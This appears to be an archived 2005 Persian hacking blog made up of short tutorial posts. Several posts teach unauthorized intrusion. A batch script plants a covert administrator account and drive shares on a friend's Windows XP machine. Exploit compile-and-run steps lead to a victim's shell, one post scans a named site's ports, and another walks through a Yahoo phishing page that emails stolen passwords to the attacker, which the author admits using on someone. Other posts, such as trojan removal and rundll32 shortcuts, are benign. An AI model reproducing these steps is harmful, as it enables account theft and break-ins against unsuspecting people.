تبلیغات
آموزش هک

به نام خدا

آموزش هک
امروز   به وبلاگ  آموزش هک  خوش آمدید


¿ساخت كاربر برای ویندوز XP
چهارشنبه 20 مهر 1384
دوست دارید برای خود روی ویندوز XP دوستان یك نام كاربری و پسورد برای خود بسازید؟ و بدون اطلاع او هر موقع خواستید وارد بشوید ؟

یا اصلا پشت یك سیستم نشسته اید و موقع ورود به سیستم از شما نام كاربری و پسورد میخواهد خب دو روش برای ورود به این ویندوز XP وجود دارد :

روش اول :

در هنگام ظاهر شدن منوی كاربران Switch User در ابتدا دوبار كلیدهای Ctrl+ Alt + Del را فشار دهید .
پس در قسمت نام كلمه Administrator یا ADMINISTRATOR را تایپ كرده و قسمت  Password  را خالی بگذارید و سپس كلید OK را فشار دهید در این حالت وارد سیستم می شوید

اما اگر برای سیستم مورد نظر Administrator تعریف شده باشد دیگر نمیشود وارد سیستم شد. بجز راه دوم ....

 

روش دوم :

برنامه Note Pad را باز كنید و دستورات زیر را در آن تایپ كنید:

Net user Raminsoft test /add
Net localgroup administrators Raminsoft /add
Net Share CDRIVE=C
Net share CDRIVE=D
Net share CDRIVE=E

اما توضیحات در خط اول شما برای ویندوز اكسپی یك Account درست كرده اید

كه در اینجا Raminsoft نام كاربری و test پسورد اكانت است.

در خط دوم به سیستم می گوییم كه كاربر Raminsoft را Administrators نماید.

خب در خط های بعدی هم برای كاربر درایوها را به اشتراك می گزاریم كه شما میتوانید كلیه درایوهای مورد نظر را یادداشت كنید.

 خب كار تایپ دستورات بالا كه تمام شد فایل را ذخیره كنید و پسوند فایل را BAT بگذارید حالا با اجرای فایل دسته ای Bat اكانت جدید برای شما ساخته می شود (( مبارك باشه ))

 

نوشته شده در چهارشنبه 20 مهر 1384 و ساعت 10:10 ق.ظ توسط : حمید نجفی
ویرایش شده در - و ساعت -

|+| نظر ها ()
¿اكسپلویت چیست ؟
سه شنبه 19 مهر 1384
پاورقی:همونطوری که می دونیم به هر کاراکتر یک عدد که شامل 0و1 است اختصاص داده میشه کدهای اکسپلویت از این قانون اطاعت می کنند. برای تبدیل اینا به زبون صفرویک که تو رایانه شما استفاده میشه از مترجم استفاده میشه که همون IIS است (درواقع این کلمه همون internet information services خودمونه !)
ببینید برای متوجه شدن این مفهوم باید با آسیب پذیری ها یا Vulnerability ها آشنایی داشته باشید . فكر كنید كه شما می خواهید به فولدر یك وب سایت كه سرور آی-آی-اس بر آن نصب شده است با استفاده از باگ Unicode دسترسی پیدا نمایید و نیاز به ارسال تعدادی درخواست به سرور هستید( البته این كار جهت هكر های خبره مانند استفاده از ماشین حساب در انجام عملیت ریاضی است‌) .

چگونه می توان از آن استفاده كرد ؟
كدهای اكسپلویت رو كامپایل كنید(نمونه كدهای اكسپلویت در سایت موجود است) بعد از كامپایل كردن یه خط فرمان به شما میده یا یه پوشه به نام read me كه دستوراتی كه میشه از اون اكسپلویت استفاده كرد رو توش نوشته ..برای اجرای اكسپلویت هم شما باید مسیر اونو درcommand سیستم مشخص كنید و با استفاده از دستورات خود اكسپلویت و آی پی هدف به اون سایت وصل بشین البته این رو هم بگم شما اول باید سایتی كه میشه از طریق اون اكسپلویت ازش Share اشتراك گرفت رو پیدا كنید ...
كامپایل اكسپلویت
شما از طریق دو سیستم عامل لینوکس و ویندوز می توانید اکسپلویت های خود را کامپایل کنید . توصیه من لینوکسه چون اکثر اکسپلویت ها در اون کامپایل میشن ولی در ویندوز چون بعضی از هدر ها رو شامل نمی شه نمیشه همه اکسپلویت ها رو کامپایل کرد .

كامپایل اكسپلویت تحت ویندوز:
برای کامپایل کردن اکسپلویت های C در ویندوز می تونید از ++Visual C و Lccwin و ++Borland C استفاده کنید (برنامه پیشنهادی من)
بعد از كامپایل اكسپلویت باید اونو اجرا کنید . و شما نمی تونید اونو با کلیک کردن اجرا کنید چون باز نمیشه برای اینکار باید اکسپلویت کامپایل شده را در دایرکتوری ویندوزتون در یك پوشه ای کپی کنید . و بعد به منوی استار رفته و روی گزینه Run کلیک کنید و سپس تایپ کنید :


کد:

cmd




حالا command prompt باز شده حالا باید اسم اکسپیویتتون رو تایپ کنید بطور مثال :


کد:

lsas.exe




اکسپلویت هم نحوه کار رو داخل همون داس ویندوز توضیح می ده که اگه یه کم زبان بلد باشین می فهمید . مثلا همین اکسپلویت بالا. با نوشتن ای پی و یک پورت انتخابی مثل ۶۶۶۹ یا ۵۲۷۷ .نوع سیستم عامل طرف رو به شما می ده و اگر سیستم طرف ویندوز سری ان تی قدیمی ( مثلا ماله پارسال ) باشه به پورتی که شما دادین حمله می کنه و کاری می کنه که شما می تونید با یه تلنت به اون پورت به شل ( Shell) سیستم قربانیتون برسید .

كامپایل اكسپولیت تحت لینوكس:

برای کامپایل کردن اکسپلویت های C در لینوکس می تونید از کامپایلر GCC استفاده کنید
برای كامپایل اكسپلویت در لینوكس به قسمت Shelle میریم و با دستور زیر


کد:

Gcc – O Exploit Name



اكسپلویت كامپایل میشه و برای اجرای اون هم از دستور زیر استفاده میكنیم


کد:

/.



نکته:اکسپلویت هایی که تحت لینوکس هستند دارای انکلود*هستند و از طریق همین انکلود هست که ما متوجه میشیم که این اکسپلویتها برای سیستم عامل لینوکس نوشته شده است
انکلود*:مجموعه ای است از تعاریف دستوراتی که برنامه نویس در برنامه اش از آن استفاده می کند
برای اجرا کردن اکسپلویت های پرل در محیط های ویندوز و لینوکس هم تنها به برنامه Active Perl احتیاج دارین

نوشته شده در سه شنبه 19 مهر 1384 و ساعت 10:10 ق.ظ توسط : حمید نجفی
ویرایش شده در - و ساعت -

|+| نظر ها ()
¿چگونه یک ارتباط TCP برقرار می‌شود که بگوییم فلان پورت باز است یا نه؟
سه شنبه 19 مهر 1384
یرای اینکه تعیین کنیم که یک پورت روی یک سرور باز است یا نه، معمولا باید یک TCP connect scan انجام دهیم. اول این را بگم که Port Scanning انواع مختلف دارد که فعلا ما نوع TCP connect را مدنظر داریم. این نوع اسکن سه مرحله دارد که به آن TCP"s 3-way handshakeمی‌گویند:
۱- اول کامپیوتر ما به سمت سرور یک SYN packet می‌فرستد که به معنی درخواست اتصال است.
۲- اگر سرور این درخواست را قبول کند، در مرحله دوم سرور به سمت ما یک SYN/ACK packet می‌فرستد.
۳- در مرحله آخر کامپیوتر ما یک ACK packet به سمت سرور می‌فرستد.

نوع دیگری از پورت اسکن TCP SYN scan نام دارد. با توجه به اینکه معمولا اگر پورت اسکن به روش بالا (TCP connect scan) انجام دهیم، معمولا در سرور این اتصال ذخیره خواهد شد و بعدا می‌تواند ما را ردیابی کنند، به جای آن می‌توان از TCP SYN scan استفاده کرد. در این نوع اسکن، مراحل ۱ و ۲ از بالا انجام می‌شود ولی مرحله ۳ نه! اگر در مرحله ۲ به ما یک SYN/ACK برسد، آن پورت باز است و اگر یک RST/ACK برسد، یعنی بسته است.

انواع دیگری از پورت اسکنینگ هم وجود دارد مثل UDP scan, TCP Window scan, TCP ACK scan, TCP Null, TCP Xmas Tree, TCP FIN Scan


- چگونه می‌توان عمل Port scanning را انجام داد؟

در تمام مطالبی که تا این مرحله گفته‌ام سعی کرده‌ام که فقط از ابزارهای موجود در ویندوز استفاده کنم و هیچ ابزار دیگری به‌کار نبرم، اما در مبحث پورت اسکنینگ چون هیچ ابزاری در ویندوز برای این‌ کار نیست، به‌ناچار باید یک سری برنامه را از اینترنت داون‌لود کنید. (توجه داشته باشید که فعلا حرفی از لینوکس نزده‌ام و سعی می‌کنم فعلا هیچ بحثی را در مورد آن مطرح نکنم)

برای Port Scanning می‌توان از ابزارهای مختلفی استفاده کرد که اکثرا برای لینوکس طراحی شده‌اند، اما مهم‌ترین پورت اسکنرها برای ویندوز عبارتند از:

۱- نرم‌افزار NMapWin v1.3.0 :
نسخه گرافیکی و مخصوص ویندوز برای nmap است (nmap در لینوکس استفاده می‌شود). nmap از کامل‌ترین ابزارهایی است که هکر‌ها استفاده می‌کنند که علاوه بر توانایی انواع پورت اسکنینگ‌ها، می‌تواند کارهای بسیاری چون تشخیص سیستم‌عامل سرور و ... را انجام دهد. این ابزار را بعدا توضیح خواهم داد ولی فعلا برای کار ما بیش‌ از حد کامله ;-)

۲- NetScanTools Pro 2000 :
این هم از بهترین‌هاست ولی چون پولی است به‌ جای داون‌لود باید در CD هایی که در بازار هست پیدایش کنید.

۳- WinScan :
برای اسکن کردن TCP (ونه UDP) می‌توانید از آن استفاده کنید. من زیاد ازش خوشم نیومد.

۴- ipEye v1.2 :
من در این درس از این نرم‌افزار استفاده خواهم کرد، برای داون‌لود آن می‌توانید به سایت http://www.ntsecurity.nu/ مراجعه کنید یا مستقیما با کلیک روی این لینک آن را داون‌لود کنید. لازم است بگویم که این نرم‌افزار فقط در ویندوز ۲۰۰۰ و xp کار می‌کند و نیز در یک بار اجرا فقط یک ip را می‌تواند تست کند. ضمنا فقط TCP را تست می‌کند.


- چگونه از ipEye برای پورت اسکنینگ استفاده کنیم؟

با تایپ ipEye در command prompt این نتایج ظاهر می‌شود:
ipEye 1.2 - (c) 2000-2001, Arne Vidstrom (arne.vidstrom@ntsecurity.nu)
          - http://ntsecurity.nu/toolbox/ipeye/
 
Error: Too few parameters.
 
Usage:
 
  ipEye <target IP> <scantype> -p <port> [optional parameters]
  ipEye <target IP> <scantype> -p <from port> <to port>
 [optional parameters]
 
  <scantype> is one of the following:
     -syn  = SYN scan
     -fin  = FIN scan
     -null = Null scan
     -xmas = Xmas scan>br> 
     (note: FIN, Null and Xmas scans don"t work against Windows systems.
 
  [optional parameters] are selected from the following:
     -sip <source IP>  = source IP for the scan
     -sp <source port> = source port for the scan
     -d <delay in ms>  = delay between scanned ports in milliseconds
                         (default set to 750 ms)


فرض کنید که می‌خواهیم سایت سازین را از نظر پورت‌ها از پورت ۱ تا ۲۰۰ تست کنیم. اول باید ip آن را به دست بیاوریم که می‌شود، 63.148.227.65 و حالا به کمک دستور زیر آن را بررسی می‌کنیم:

ipeye 63.148.227.65 -syn -p 1 200

دقت کنید که 63.148.227.65 عدد ip سازین، syn- یعنی SYN SCAN و p 1 200- یعنی تست از پورت ۱ تا ۲۰۰ باشد. البته پارامترهای دیگری را هم می‌شود ست کرد که فعلا به درد ما نمی‌خورد. با اجرای این دستور به نتایج زیر می‌رسیم:

ipEye 1.2 - (c) 2000-2001, Arne Vidstrom (arne.vidstrom@ntsecurity.nu)
          - http://ntsecurity.nu/toolbox/ipeye/
 
  1-20 [drop]
  21 [open]
  22 [closed or reject]
  23-24 [drop]
  25 [open]
  26-52 [drop]
  53 [open]
  54-79 [drop]
  80 [open]
  81-109 [drop]
  110 [open]
  111-142 [drop]
  143 [open]
  144-200 [drop]
  201-65535 [not scanned]

Closed یعنی کامپیوتر در آن طرف هست ولی به پورت گوش نمی‌دهد، Reject یعنی اینکه یک firewall هست که اجازه اتصال به آن پورت را نمی‌دهد، Drop یعنی اینکه یک firewall همه‌چیز را پس‌ می‌زند و یا اصلا کامپیوتری اونور نیست، Open هم که یعنی باز.
در مورد سازین می‌بینید که از بین پورت‌های ۱ تا ۲۰۰ ، پورت‌های ۲۱، ۲۵، ۵۳، ۸۰، ۱۱۰، ۱۴۳ باز است و می‌توان به‌ آنها telnet کرد. دقت کنید که تا تمام پورت‌هایی که مشخص شده، تست نشده است، هیچ نتیجه‌ای نشان داده نمی‌شود و یه‌کم صبر می‌خواد.


- تعیین پورت‌های باز کامپیوتر خودتان

می‌خواهیم درباره کامپیوتر خودمان این اطلاعات را پیدا کنیم. برای این کار یکی از دستورات زیر را به کار می‌بریم:

netstat -an
netstat -a

فرق این دو دستور در این است که اولی پورت‌ها را به صورت عددی و دومی به صورت معادل اسمی آن پورت می‌نویسد. مثلا معادل اسمی پورت 7 ، echo است.

مثلا اگه netstat -an را تایپ کنم، به اطلاعات زیر می‌رسم:

Active Connections
 
  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:7              0.0.0.0:0              LISTENING
  TCP    0.0.0.0:9              0.0.0.0:0              LISTENING
  TCP    0.0.0.0:13             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:17             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:19             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:21             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:25             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:53             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:119            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:143            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:443            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:515            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:563            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1025           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1026           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1033           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1037           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1040           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1041           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1043           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1755           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1801           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:3372           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:6034           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:6666           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:7007           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:7778           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:8181           0.0.0.0:0              LISTENING
  TCP    127.0.0.1:1039         0.0.0.0:0              LISTENING
  TCP    127.0.0.1:1433         0.0.0.0:0              LISTENING
  TCP    127.0.0.1:2103         0.0.0.0:0              LISTENING
  TCP    127.0.0.1:2105         0.0.0.0:0              LISTENING
  TCP    127.0.0.1:2107         0.0.0.0:0              LISTENING
  UDP    0.0.0.0:7              *:*
  UDP    0.0.0.0:9              *:*
  UDP    0.0.0.0:13             *:*
  UDP    0.0.0.0:17             *:*
  UDP    0.0.0.0:19             *:*
  UDP    0.0.0.0:68             *:*
  UDP    0.0.0.0:135            *:*
  UDP    0.0.0.0:161            *:*
  UDP    0.0.0.0:445            *:*
  UDP    0.0.0.0:1030           *:*
  UDP    0.0.0.0:1036           *:*
  UDP    0.0.0.0:1038           *:*
  UDP    0.0.0.0:1042           *:*
  UDP    0.0.0.0:1075           *:*
  UDP    0.0.0.0:1434           *:*
  UDP    0.0.0.0:1645           *:*
  UDP    0.0.0.0:1646           *:*
  UDP    0.0.0.0:1755           *:*
  UDP    0.0.0.0:1812           *:*
  UDP    0.0.0.0:1813           *:*
  UDP    0.0.0.0:3456           *:*
  UDP    0.0.0.0:3527           *:*
  UDP    127.0.0.1:53           *:*
  UDP    127.0.0.1:1028         *:*
  UDP    127.0.0.1:1029         *:*
  UDP    127.0.0.1:1035         *:*
  UDP    127.0.0.1:1044         *:*
  UDP    127.0.0.1:1045         *:*
  UDP    127.0.0.1:1100         *:*

من دستور را موقعی اجرا کردم که به اینترنت متصل نبودم. اگر همین کار را در زمان اتصال به اینترنت انجام می‌دادم، یک سری سطرهای جدید هم اضافه می‌شد که مربوط به آن اتصال می‌شد. و نیز دقت کنید که من سویچ an- را استفاده کردم و پورت‌ها به صورت عددی نمایش داده شده است که همین الان - الساعه - براتون توضیح می‌دم:

اولین نکته‌ای که به نظر می‌رسد، نامی است که برای هر ستون نوشته شده است:

  Proto      Local Address       Foreign Address       State

- Proto : یعنی پروتکل، که می‌تواند TCP یا UDP باشد.
- Local Address : نشان‌دهنده ip کامپیوتر خودمان و شماره پورت‌هاست. مثلا سطر اول می‌گوید که ip من 0.0.0.0 است (دقت کنید که من به اینترنت متصل نیستم) و اولین پورت باز (از نوع TCP با توجه به اول سطر) عدد ۷ است زیرا این به صورت 0.0.0.0:7 نوشته شده است که قسمت قبل از کاراکتر : ، ip است و بعد از کاراکتر :، پورت است.
- Foreign Address : چون در این مثال از سویچ a- یا an- استفاده کرده‌ایم، کاربردی ندارد. ولی بعدا خواهید دید که اگر از یک سویچ دیگر استفاده کنیم، می‌تواند مهم باشد.
- State : وضعیت اتصال را نشان می‌دهد


حالا اگه پورت‌ها را یکی یکی بررسی کنید، می‌بینید که در پروتکل TCP ، پورت‌های ۷، ۹، ۱۳، ۱۷، ۱۹، ۲۱ و... باز است و در پروتکل UDP ، پورت‌های ۷، ۹، ۱۳، ۱۷، ۱۹، ۶۸ و ... باز است.

حالا ممکن است بپرسید که این اطلاعات به چه دردی می‌خورد؟
جواب این است که دانستن این اطلاعات برای محافظت از خودتان در برابر همکارانتان (هکرها) است. مثلا اگر یک تروجان روی کامپیوتر شما نصب شده باشد، با این دستور می‌توان آن را کشف کرد.

نوشته شده در سه شنبه 19 مهر 1384 و ساعت 10:10 ق.ظ توسط : حمید نجفی
ویرایش شده در - و ساعت -

|+| نظر ها ()
¿بعضی از آدرسهای سخت افزارها در رجیستری
سه شنبه 19 مهر 1384
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E979-E325-11CE-BFC1-08002BE10318}]
@="پرینتر ها"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E97D-E325-11CE-BFC1-08002BE10318}]
@="ابزارهای سیستم"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E97E-E325-11CE-BFC1-08002BE10318}]
@="ابزارهای دیگر"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E980-E325-11CE-BFC1-08002BE10318}]
@="فلاپی درایو"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{50127DC3-0F36-415E-A6CC-4CB3BE910B65}]
@="پردازنده"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E978-E325-11CE-BFC1-08002BE10318}]
@="(COM & LPT)درگاهها"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E966-E325-11CE-BFC1-08002BE10318}]
@="كامپیوتر شما"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E967-E325-11CE-BFC1-08002BE10318}]
@="هارد دیسك"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}]
@="كارت گرافیك"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E96B-E325-11CE-BFC1-08002BE10318}]
@="صفحه كلید"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}]
@="مودم"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E96E-E325-11CE-BFC1-08002BE10318}]
@="نمایش گر"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E96F-E325-11CE-BFC1-08002BE10318}]
@="موس"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{36FC9E60-C465-11CF-8056-444553540000}]
@="USPپورت"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E965-E325-11CE-BFC1-08002BE10318}]
@="سی دی رام/دی وی دی رام/رایتر"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E969-E325-11CE-BFC1-08002BE10318}]
@="كنترل فلاپی درایو ها"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E96A-E325-11CE-BFC1-08002BE10318}]
@="IDE ATA/ATAPI تنظیمات"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E97B-E325-11CE-BFC1-08002BE10318}]
@="SCSI and RAID تنظیمات"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E96C-E325-11CE-BFC1-08002BE10318}]
@="تنظیمات درایور های صوتی تصویری"

نوشته شده در سه شنبه 19 مهر 1384 و ساعت 09:10 ق.ظ توسط : حمید نجفی
ویرایش شده در - و ساعت -

|+| نظر ها ()
¿دسترسی به کنترلهای ویندوز با Rundll32
سه شنبه 19 مهر 1384
 یک برنامه در دل ویندوز است که توابع موجود در DLL ها را اجرا میکند و اگر درون Registry را جستجو کنید متوجه میشوید که سیستم از آن برای خیلی از وظایف خود استفاده میکند و بسیاری از برنامه ها از آن برای انجام فعالیتهای خود از این برنامه کمک میگیرند.
شاید آشنایی با شیوه فراخواندن برنامه ها با Rundll32 بتواند مفید باشد مخصوصا برای برنامه نویسان:

 

توجه داشته باشید که توابع استفاده شده در فرامین زیر به بزرگی و کوچکی حروف حساس میباشند.

اجرای فرمان زیر باعث نمایش کنترل User Accounts میشود:

rundll32.exe netplwiz.dll,UsersRunDll

اجرای فرمان زیر در خط فرمان باعث اجرای Add Printer Wizard میشود:

rundll32.exe printui.dll,PrintUIEntry /il

اجرای فرمان زیر باعث نمایش پنجره New Share میشود:

rundll32.exe ntlanui.dll,ShareCreate

اجرای فرمان زیر باعث نمایش پنجره Shared Directories میشود:

rundll32.exe ntlanui.dll,ShareManage

اجرای فرمان زیر باعث نمایش پنجره System Properties میشود:

rundll32 shell32,Control_RunDLL "sysdm.cpl"

فرمان زیر این امکان را به شما میدهد که از خط فرمان یک URL را باز کنید:

rundll32.exe url.dll,FileProtocolHandler http://www.iranbrains.net

میتوانید از فرامین بالا برای ایجاد میانبر و دسترسی سریعتر به کنترلها استفاده کنید

نوشته شده در سه شنبه 19 مهر 1384 و ساعت 09:10 ق.ظ توسط : حمید نجفی
ویرایش شده در - و ساعت -

|+| نظر ها ()
¿نصب ویندوز بدون وارد كردن سریال
سه شنبه 19 مهر 1384

حتما برای شما هم پیش آمده كه سریال ویندوز مورد نظر خود را گم كرده یا آن را اشتباه وارد كرده باشید , یا به هر ترتیب به آن دسترسی نداشته باشید . پس اگر چنین بوده , دیگر لازم نیست به دنبال سریال ویندوز خود بگردید .چون با این روش سریال ویندوز از قبل وارد شده است.
این روش برای همه ویندوزهای 9X قابل اجرا می باشد .

ابتدا Notepad را باز می كنیم و چند خط زیر را در آن اضافه می كنیم : ( می توانید كپی كنید )

; MSBATCH.INF
;
; Copyright (c) 2003-2004 kasra747.com .
; All rights reserved.
;

[BatchSetup]
Version=3.0 (32-bit)
SaveDate=01/29/00

[Version]
Signature = "$CHICAGO$"
[Setup]

ProductKey="xxxxx-xxxxx-xxxxx-xxxxx-xxxxx"

سپس , به جای x در ProductKey , سریال ویندوز مورد نظر خود را وارد كنید . و آن را با نام MSBATCH و با پسوند inf ذخیره نمایید .
برای تست برنامه , Setup.exe را جهت نصب ویندوز اجرا كنید و مراحل نصب را ادامه دهید . حال , می بینید كه سریال ویندوز از قبل وارد شده است . به این ترتیب شما می توانید ویندوز خود را بر روی CD كپی كرده و بدون وارد كردن سریال , آن را نصب نمایید .
منبع:پی سی نت

نوشته شده در سه شنبه 19 مهر 1384 و ساعت 09:10 ق.ظ توسط : حمید نجفی
ویرایش شده در سه شنبه 19 مهر 1384 و ساعت 09:10 ق.ظ

|+| نظر ها ()
¿روش مقابله با Magic Ps
سه شنبه 19 مهر 1384
خب حالا كه این روزها بحث تروجان ایرانی MAGIC PS داغ هست و همه كاربر ها از دزدیده شدن پسورد های ایدی خود در هراس می باشند، در این جا روش مبارزه و جلوگیری از كار این برنامه آموزش می دهم...



ابتدا از منوی start گزینه RUN را انتخاب می كنیم.

سپس تایپ كنیدRegedit بعد از باز شدن پنجره

Registry Editor به زیر شاخه های زیر بروید .

HKEY_CURRENT_USERSoftwareMicrosoft

WindowsCurrentVersion un

و همچنین به كلید :

HKEY_LOCAL_MACHINESOFTWARE

MicrosoftWindowsCurrentVersionRun



خب حالا باید داخل این دو كلید در ریجستری به دنبال متغییر SVCHOST یا svchost بگردید و اگر وجود داشت آن را پاك كنید و یك بار سیستم خود را راه اندازی مجدد كنید.

نوشته شده در سه شنبه 19 مهر 1384 و ساعت 09:10 ق.ظ توسط : حمید نجفی
ویرایش شده در - و ساعت -

|+| نظر ها ()
¿هك كردن آی دی یاهو (Hack Yahoo ID)
دوشنبه 18 مهر 1384

آیا تا بحال دوستان خودتونو كه یه آی دی توی یاهو دارن رو هك كردین یا مثلا موقع چت پسورد طرف رو در آوردین. میشه اصلا این كار رو كرد . من میخوام یه نفرو هك كنم و آی دی اونو دارم میخوام پسوردش رو هم بدس بیارم چطور میتونم این كارو بكنم؟ این سوال جوابش توی این صفحه هست ، و اگه میخوایید بدونید چطور میشه اینكارو كرد به ادامه بحث توجه كنید :



خوب اول از همه این كد رو بصورت یه صفحه HTML توی یه سایت آپ لود میكنید میتونید برای این كار از سایتهایی كه هاست مجانی میدن و یا خود سایت یاهو  هم استفاده كنید ولی قبلش باید توی قسمت آدرس ایمیل و آدرس صفحه ای كه طرف بعداز این صفحه میخواد ببینه رو باید وارد كنید من واسه نمونه آدرس ایمیل الكی eee@uuu.com دادم و آدرس سایت هم اینو زدم http://mail.yahoo.com/?.intl=us شما باید آدرس ایمل خودتو بزنی و آدرس صفحه بعدی رو هم یه صفحه ای بزنی كه طرف شك نكنه كه من آدرس صفحه ساین این یاهو رو زدم تا فكر كنه اشتباهی پسورد زده كه صفحه دوباره اومده (میتونی این دوتا رو سرچ كنی و بجاش مال خودتونو بزنی) . بعدش فقط كافیه به طرف آدرس صفحه تونو یه جوری بدین مثلا یه ایمیل واسش بزنین و بگین بره این صفحه رو تماشا كنه و ان هم میزنه میبینه یوزر نیم و پسورد میخواد چون صفحه درست شبیه تاهو هست اصلا شك نمیكنه فكر میكنه یاهو داره اطلاعات میگیره وقتی اطلاعاتش رو زد این اطلاعات واسه شما به اون آدرس ایمیلی كه زدید فرستاده میشه ، باحاله نه . من خودم این كارو با یه نفر كردم و بهش یه ایمیل زدم گفتم برو عكس زیر رو كه آدرسش رو دادم ببین و طرف از همجا بیخبر رفت و دید یاهو ازش پسورد میخواد كه زد و یه عكس بیخودی هم نشونش دادم ولی بعدش پسوردش دستم بود خیلی باحاله . ولی شما باید خیلی دقت كنید تا طرف تون شك نكنه كه هك شده ها و بعدش خواهشن زیاد طرفو اذیت نكنید كه خیلی كار بدیه یعنی میشه گفت : بلابدور عجب مردم آزارایی پیدا میشن.

خوب بیشتر از این حرف نمیزنم فقط یادتون باشه زیاد اذیت نكنید ها اینم كد:

منبع ایران ویج

نوشته شده در دوشنبه 18 مهر 1384 و ساعت 10:10 ق.ظ توسط : حمید نجفی
ویرایش شده در - و ساعت -

|+| نظر ها ()